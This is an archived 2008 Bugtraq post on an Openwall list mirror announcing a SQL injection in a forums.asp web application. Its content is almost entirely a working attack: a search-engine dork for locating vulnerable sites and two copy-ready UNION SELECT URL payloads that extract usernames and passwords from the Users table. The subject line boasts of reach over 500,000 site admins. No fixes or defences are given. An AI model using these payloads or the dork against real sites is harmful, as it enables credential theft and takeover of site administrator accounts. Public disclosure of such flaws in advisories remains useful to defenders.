| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20080213163325.28760.qmail@securityfocus.com> Date: 13 Feb 2008 16:33:25 -0000 From: hackturkiye.hackturkiye@...il.com To: bugtraq@...urityfocus.com Subject: all forums.asp hack this exploit have 500.000 site admin ######################################################################### # # forums.asp hack (content.asp?contenttype) SQL Injection # ######################################################################### # # AUTHOR : S@BUN # # HOME : http://www.hackturkiye.com/ # ######################################################################### # # # DORKS 2 : allinurl: "content.asp?contenttype" # # ######################################################################### EXPLOIT 1: forums.asp?keywords=S@...&do_search=1&sortby=users.user_name+UNION+SELECT+1,2,3,4,5,user_name,password,8,9,10,11,12,13,14+FROM+Users EXPLOIT 2: forums.asp?keywords=S@...&do_search=1&sortby= users.user_name+UNION+SELECT+1,2,3,4,5,user_name,password,8,9,10,11,12,13,14,15+FROM+Users ######################################################################### # S@BUN www.hackturkiye.com S@BUN ######################################################################### ######################################################################### # S@BUN GOOD LUCKY S@BUN #########################################################################
Powered by blists - more mailing lists